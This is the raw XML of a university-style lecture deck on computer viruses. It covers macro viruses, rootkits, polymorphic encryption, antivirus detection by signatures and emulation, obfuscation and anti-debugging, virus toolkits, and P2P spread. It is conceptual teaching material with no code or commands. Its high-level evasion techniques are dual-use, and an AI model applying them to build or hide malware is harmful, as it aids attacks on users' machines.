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11" r:id="rId37"/>
    <p:sldId id="312" r:id="rId38"/>
    <p:sldId id="313" r:id="rId3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1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7FFEB-A9B5-4EBF-8BB1-7A9F08C38949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B6690-78BB-445F-817B-75DA70F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8CC8B22-CC93-409D-BC3C-989C49DCCFC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553E61-7705-45FF-B9B3-89886AC45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solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{99AC151C-9C53-4193-AF6C-8390526294BF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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81300" y="4267200"/>
            <a:ext cx="3505200" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thomas Kay</a:t>
            </a:r>
            <a:endParaRPr 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1066800"/>
            <a:ext cx="8610600" cy="16002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Viruses, Rootkits, and More…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A87EF148-B735-4D7B-BFC9-B0E6B6D61B82}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10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 smtClean="0"/>
              <a:t>Virus Techniques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Macro viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is an executable program embedded in a word processing document (MS Word) or spreadsheet (Excel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When an infected document is opened, virus copies itself into global macro file and makes itself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auto-executing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (invoked whenever any document is opened)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stealth techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rootkit: infect OS so that infected files appear normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Code mutation and obfuscation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15124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B32BF97-648F-4573-91B5-CE762C3E18C4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Polymorphic Viruses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Encrypted viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: constant decryptor followed by the encrypted virus body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Polymorphic viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: constantly create new random encryptions of the same virus body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Virus includes an engine for creating new keys and new encryptions of the virus body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Decryptor code constant and can be detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Historical note: “Crypto” virus decrypted its body by brute-force key search to avoid explicit decryptor code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29607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39945818-DA09-4A9E-B2A8-24642F1BC050}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12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914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Virus Detection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Simple anti-virus scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Look for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signatures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (fragments of known virus code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Heuristics for recognizing code associated with viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: polymorphic viruses often use decryption loops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Integrity checking to find modified files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Record file sizes, checksums, keyed HMACs of contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Generic decryption and emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Emulate CPU execution for a few hundred instructions, recognize known body after virus decrypts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Does not work very well against metamorphic viruses and viruses not located near beginning of infected executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What if decryptor starts with millions of NOPs?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2234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4664CECD-5939-47E9-AF93-C1F18518C050}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Virus Detection by Emulation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388938" y="2667000"/>
            <a:ext cx="1363662" cy="990600"/>
            <a:chOff x="245" y="1680"/>
            <a:chExt cx="859" cy="624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16429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480" cy="288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30" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="245" y="1680"/>
              <a:ext cx="8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Virus body</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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397000" y="1538288"/>
            <a:ext cx="3251200" cy="1890712"/>
            <a:chOff x="880" y="969"/>
            <a:chExt cx="2048" cy="1191"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16426" name="Rectangle 7" descr="Wide downward diagonal"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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27" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="880" y="969"/>
              <a:ext cx="204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Randomly generates a new key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>and corresponding decryptor code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16428" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="912" y="1488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3429000" y="2133600"/>
            <a:ext cx="5124450" cy="457200"/>
            <a:chOff x="2160" y="1344"/>
            <a:chExt cx="3228" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16422" name="Rectangle 11" descr="Wide downward diagonal"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="312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23" name="Rectangle 12" descr="Wide downward diagonal"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="1344"/>
              <a:ext cx="816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chemeClr val="tx2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24" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4509" y="1344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Mutation A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16425" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2160" y="148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0" y="1587500"/>
            <a:ext cx="2514600" cy="546100"/>
            <a:chOff x="3360" y="1000"/>
            <a:chExt cx="1584" cy="344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16420" name="Freeform 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3360" y="1000"/>
              <a:ext cx="624" cy="344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 624"/>
                <a:gd name="T1" fmla="*/ 344 h 344"/>
                <a:gd name="T2" fmla="*/ 288 w 624"/>
                <a:gd name="T3" fmla="*/ 8 h 344"/>
                <a:gd name="T4" fmla="*/ 624 w 624"/>
                <a:gd name="T5" fmla="*/ 296 h 344"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 624"/>
                <a:gd name="T10" fmla="*/ 0 h 344"/>
                <a:gd name="T11" fmla="*/ 624 w 62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44">
                  <a:moveTo>
                    <a:pt x="0" y="344"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="180"/>
                    <a:pt x="184" y="16"/>
                    <a:pt x="288" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="0"/>
                    <a:pt x="568" y="248"/>
                    <a:pt x="624" y="2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Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3810" y="1008"/>
              <a:ext cx="11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Decrypt and execute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67000" y="2590800"/>
            <a:ext cx="3657600" cy="1066800"/>
            <a:chOff x="1680" y="1632"/>
            <a:chExt cx="2304" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16418" name="Rectangle 19" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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19" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2160" y="1632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67000" y="3657600"/>
            <a:ext cx="3657600" cy="1066800"/>
            <a:chOff x="1680" y="2304"/>
            <a:chExt cx="2304" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16416" name="Rectangle 22" descr="Shingle"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="168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17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429000" y="4251325"/>
            <a:ext cx="5129213" cy="473075"/>
            <a:chOff x="2160" y="2678"/>
            <a:chExt cx="3231" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16412" name="Rectangle 25" descr="Shingle"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="312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13" name="Rectangle 26" descr="Shingle"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2688"/>
              <a:ext cx="816" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="shingle">
              <a:fgClr>
                <a:schemeClr val="tx2"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="hlink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14" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4512" y="2678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Mutation C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16415" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2160" y="28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429000" y="3184525"/>
            <a:ext cx="5127625" cy="473075"/>
            <a:chOff x="2160" y="2006"/>
            <a:chExt cx="3230" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16408" name="Rectangle 30" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="312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09" name="Rectangle 31" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2016"/>
              <a:ext cx="816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chemeClr val="tx2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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16410" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4513" y="2006"/>
              <a:ext cx="8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Mutation B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16411" name="Line 33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57200" y="5165725"/>
            <a:ext cx="7924800" cy="1235075"/>
            <a:chOff x="288" y="3254"/>
            <a:chExt cx="4992" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16397" name="Group 35"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="296" y="3254"/>
              <a:ext cx="4946" cy="250"/>
              <a:chOff x="104" y="3504"/>
              <a:chExt cx="4946" cy="250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16403" name="Text Box 36"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="104" y="3504"/>
                <a:ext cx="49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prstDash val="dash"/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2000">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>To detect an unknown mutation                   of a known virus        ,</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16404" name="Group 37"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2496" y="3552"/>
                <a:ext cx="768" cy="192"/>
                <a:chOff x="1296" y="3456"/>
                <a:chExt cx="1296" cy="288"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="16406" name="Rectangle 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296" y="3456"/>
                  <a:ext cx="480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rgbClr val="FFFFFF"/>
                  </a:bgClr>
                </a:pattFill>
                <a:ln w="28575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/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="16407" name="Rectangle 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776" y="3456"/>
                  <a:ext cx="816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chemeClr val="tx2"/>
                  </a:bgClr>
                </a:pattFill>
                <a:ln w="28575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•"/>
                    <a:defRPr sz="2400">
                      <a:solidFill>
                        <a:schemeClr val="bg2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/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16405" name="Rectangle 40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336" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln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/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16398" name="Text Box 41"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="288" y="3552"/>
              <a:ext cx="48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emulate CPU execution of                  until the current sequence of</a:t>
              </a:r>
            </a:p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instruction opcodes matches the known sequence for virus body</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16399" name="Group 42"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256" y="3600"/>
              <a:ext cx="768" cy="192"/>
              <a:chOff x="1296" y="3456"/>
              <a:chExt cx="1296" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16401" name="Rectangle 43" descr="Wide downward diagonal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0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/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16402" name="Rectangle 44" descr="Wide downward diagonal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816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chemeClr val="tx2"/>
                </a:bgClr>
              </a:pattFill>
              <a:ln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/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16400" name="Rectangle 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4944" y="3840"/>
              <a:ext cx="336" cy="19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CA61E04A-278B-4CC8-9E60-47896C1A1A1D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14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61" y="526916"/>
            <a:ext cx="8509000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obfuscation and Anti-Debugging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Common in worms, viruses, bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: prevent code analysis and signature-based detection, foil reverse-engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insert garbage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>opcodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and change control structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different code in each copy of the virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effect of code execution is the same, but difficult to detect by passive analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packed binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detect debuggers and virtual machines, terminate execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16049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51C2E12-82D6-4194-8F79-F26B65FE50F5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15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 smtClean="0"/>
              <a:t>How Hard Is It to Write a Virus?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 smtClean="0"/>
              <a:t>2268 matches for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“virus creation tool”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> in CA’s Spyware Information Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Including dozens of poly- and metamorphic engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OverWritting Virus Construction Toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"The perfect choice for beginners”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Biological Warfare Virus Creation Kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vbs Worm Generator (for Visual Basic worms)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Used to create the Anna Kournikova worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean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8676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6DCED489-E822-4936-BB6E-52BD84947488}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16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792956"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viruses in P2P Networks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smtClean="0"/>
              <a:t>Millions of users willingly download files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>KaZaA: 2.5 million users in May 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Easy to insert an infected file into the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Pretend to be an executable of a popular application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“Adobe Photoshop 10 full.exe”, “WinZip 8.1.exe”, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2006: ICQ and Trillian the most popular names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Malware can open backdoors, steal confidential information, spread spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>70% of infected hosts already on DNS spam blacklists (what does this imply?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="739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BC7E39E-E42A-4E90-811A-07993D21F778}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
